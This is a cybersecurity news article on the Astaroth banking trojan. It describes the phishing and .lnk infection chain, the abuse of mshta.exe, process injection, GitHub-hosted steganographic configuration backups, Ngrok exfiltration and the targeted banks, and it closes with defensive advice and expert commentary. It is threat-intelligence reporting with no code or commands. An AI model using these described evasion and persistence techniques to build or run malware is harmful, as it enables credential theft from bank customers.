Astaroth Trojan Uses GitHub Images to Stay Active After Takedowns

A new report from McAfee Labs reveals that a dangerous banking trojan, Astaroth, is being distributed with a worrying new trick to stay active- abusing the software development platform GitHub as a secret backup location.

****An Unexpected New Hiding Place****

Written in Delphi, Astaroth is a banking trojan designed to silently steal login details and passwords using keylogging when a victim accesses banking or cryptocurrency accounts. Normally, these cybercriminals rely on central C2 (command-and-control) servers that security experts can find and disable.

However, the McAfee Threat Research team discovered that Astaroth is storing its vital setup files on GitHub. This means, if the main C2 server is shut down by law enforcement or security experts, Astaroth simply gets new instructions from the GitHub repository, which hosts the information hidden in images using steganography, and continues its operations. Once credentials are stolen, the malware uses the tool Ngrok to secretly exfiltrate the data back to the attackers.

****How the Attack Starts****

The attack usually begins with a phishing email (pretending to be a document or resume) that contains a link. This link downloads a zipped file with a malicious Windows shortcut (.lnk) file.

Astaroth C2 Infrastructure, Phishing Email and Attack Flow (source: McAfee)

Opening this shortcut triggers a complex, multi-stage infection chain that eventually installs Astaroth by abusing legitimate Windows system files, a technique known as living off the land. The .lnk file executes a hidden script using mshta.exe (a Microsoft HTML Application host) to get additional code.

The final malicious payload is then secretly injected into the legitimate Windows process regsvc.exe (Remote Registry Service) to run undetected. The Astaroth malware also employs various anti-analysis techniques, including monitoring and targeting popular web browsers (programs with a window class name containing chrome, ieframe, mozilla, or xoff).

Astaroth targets financial institutions across a wide region, including Brazil (where the current campaign is focused), Mexico, Uruguay, Argentina, Paraguay, Chile, Bolivia, Peru, Ecuador, Colombia, Venezuela, Panama, Portugal, and Italy.

Targeted Brazilian financial institutions include sites like caixa.gov.br, safra.com.br, itau.com.br, bancooriginal.com.br, santandernet.com.br, and btgpactual.com. It also targets cryptocurrency-related sites such as etherscan.io, binance.com, bitcointrade.com.br, and localbitcoins.com.

Moreover, the malware instantly shuts down if it detects that it is being analysed by security researchers. McAfee Labs reported its findings to GitHub, after which the malicious files were taken down, temporarily disrupting this latest activity.

This latest development confirms Astaroth remains one of the most sophisticated online threats and follows previous warnings from security experts. In February 2025, Hackread.com reported on an advanced Astaroth phishing kit discovered by SlashNext that used an “evilginx-style reverse proxy” to easily bypass two-factor authentication (2FA) and steal credentials and session cookies in real time.

The current banking trojan variant primarily relies on keylogging after infection and may not actively bypass 2FA during login. Nevertheless, to protect yourself, the most critical step is to never open links or attachments in emails from unknown senders.

“The threat landscape is surging, in particular the mobile threat landscape, as in 2024, more than 4 million social engineering attacks targeted mobile devices, over 33 million mobile malware/adware incidents were blocked, and phishing attacks rose significantly, especially on iOS,“ said Randolph Barr, Chief Information Security Officer at Cequence Security.

“Android continues to face banking Trojans and data-leaking SDKs, while insecure app practices plague both platforms. Most of these attacks are aimed at PII, credentials, and financial data,“ Barr cautioned.

“Employers and service providers add a third risk layer. Each validation request is a new integration point, creating an additional attack surface. Bad actors could compromise employer systems, abuse verification APIs, or phish organizations into over-collecting and mishandling sensitive data. Since employers often lack the same level of cybersecurity maturity as, say, government systems, they may become the weakest link in the chain,“ he warned.